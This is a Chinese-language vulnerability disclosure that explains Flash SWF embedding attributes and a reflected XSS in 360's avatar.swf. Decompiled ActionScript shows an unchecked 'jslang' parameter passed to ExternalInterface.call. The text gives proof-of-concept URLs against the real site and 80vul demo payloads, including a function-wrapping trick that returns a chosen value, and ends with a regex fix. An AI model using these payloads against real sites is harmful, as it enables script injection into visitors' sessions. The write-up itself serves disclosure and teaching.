360某处Flash应用存在漏洞,可能导致跨站脚本攻击。
在一切开始之前,我们先来说明几个基本的问题。
1.SWF如何被嵌入HTML页面的
此处所说的嵌入,就是指当你打开一个网页,这个网页中包含着SWF媒体文件,通常是embed或者object标签的形式。SWF嵌入HTML时,embed或者object标签通常还含有几个特定的属性,关键的有allowScriptAccess以及allowNetworking。
allowScriptAccess控制着SWF文件与HTML页面通信的级别,这里所说的通信,包括但不仅限于让SWF执行JS,还囊括了从JS调用SWF里预留出的api接口。
allowScriptAccess有以下三个值:
always 允许任意SWF文件与HTML页面通信。
never 禁止任意SWF文件与HTML页面通信。
samedomain 只有在SWF文件来自与HTML页相同的域时才允许通信。
当未指定allowScriptAccess时,samedomain为默认值。
allowNetworking控制着SWF文件与WEB通信的级别,这里所说的通信,基本上就是发送、读取网络上的资源文件,以及控制浏览器的页面导航。
allowNetworking有以下三个值:
all 无任何限制。
internal 禁止控制浏览器页面导航的函数。
none 禁止任何网络通信。
当未指定allowNetworking时,all为默认值。
2.我直接打开SWF文件时发生了什么
如果你在直接打开SWF文件时,使用IE开发者工具或者Firebug查看DOM源码就会发现,其实你打开的还是一个HTML页面,页面的内容只有一行代码:
<embed type="application/x-shockwave-flash" src="[SWF URL]" name="plugin" height="100%" width="100%">
前面我们已经讲了两个基本的属性,这里都没有指定,那么Flash Player自动取其默认值:allowScriptAccess=samedomain & allowNetworking=all.
在明白了上面两点之后,我们就能下面几个容易让人混淆的问题作出解答:
- a.com 的html页面 embed 了一个 b.com 的xss.swf,脚本执行域是哪个域?
- a.com 因为swf并不能执行JS,我们见到的他所执行的JS,其实是flash player通过调用承载他的html页面的js来实现的,所以是a.com。
- a.com 的html页面 iframe 了一个 b.com 的xss.swf,脚本执行域是哪个域?
- b.com 因为iframe了一个swf,其实是iframe了一个只有一行代码的HTML页面,html页面的域是b.com,故脚本的执行域也是b.com。
- a.com/load.swf能够加载任意的swf,我直接打开http://www.2cto.com /load.swf?url=http://b.com/xss.swf,能不能执行脚本?
- 不能,因为直接打开一个swf,他的allowScriptAccess是samedomain,而xss.swf的域是b.com,所以不能执行JS。
Flash里能执行JS的脚本函数有以下:
getURL(AS2) / navigateToURL (AS3)
flash.external.ExternalInterface.call(methodName:String, [parameter1:Object])
我们只需要搜索getURL/navigateToURL/ExternalInterface.call等关键字,然后在逆溯变量是否可控,就可以找到一些最基本的XSS漏洞。
以360的这个swf为例,
搜索ExternalInterface.call,我们发现了下面的代码。
public static function initLanguage() : void
{
var _loc_1:* = null;
Param.language = {};
if (ExternalInterface.available)
{
_loc_1 = ExternalInterface.call(Param.jsLang);
if (_loc_1 != null)
{
Param.language["CX0189"] = _loc_1["CX0189"];
Param.language["CX0193"] = _loc_1["CX0193"];
_loc_1 = null;
}
}
return;
}
回溯Param.jsLang
this.parameter = this.loaderInfo.parameters;
...
Param.jsFunc = this.parameter["jsfunc"];
...
Param.initLanguage()
这里的loaderInfo.parameters就是接受外部以flashvars或者类似a.swf?a=va&b=vb形式传入的变量和值。
这里我们打开 http://wan.360.cn/swf/avatar.swf?jslang=alert(1)
这里我们也许还有一个疑问,在官方的帮助文档里,flash.external.ExternalInterface.call可以接受两个参数,第一个是methodName,第二个是要传入的变量,那么对于上面的poc,正确的调用方法应该是flash.external.ExternalInterface.call("alert","1")才是,为什么flash.external.ExternalInterface.call("alert(1)")也能成功。
我们打开ie的调试工具,借用80vul.com上的demo,看看swf执行js时候发生了什么。
首先打开的是http://www.80vul.com/xss.swf?a=alert&b=1
try { __flash__toXML(alert("1")) ; } catch (e) { "<undefined/>"; }
__flash__toXML是将函数执行的结果进行编码后传回SWF的函数,外面再嵌套了一层容错语句,看来一切和预想的一样
再打开http://www.80vul.com/xss.swf?a=alert(2)&b=1
try { __flash__toXML(alert(2)("1")) ; } catch (e) { "<undefined/>"; }
JS先执行了alert(2),弹出对话框。
再单步进入
alert函数没有返回值,alert(2)("1")出错,所以跳到了catch语句
这样一来,就能解释为什么即使不按adobe的文档说明的方法进行调用,也能执行js了,再多说一句,由于这样会引起出错导致SWF接收不到JS返回的值,所以在某些特定的情况下,我们要对插入的函数进行进一步的变化,比如
http://www.80vul.com/xss.swf?a=(function(_a){alert(_a);return function(_z){prompt(2,3)};return 5})(1)&b=4
这样,SWF就可以接收到我们可以任意构造的返回值 5 了。
原始SWF下载:http://swfpoc.appspot.com/vul/wan.360.cn_swf_avatar.swf
修复方案:
正则匹配下,只允许[a-zA-Z\.]
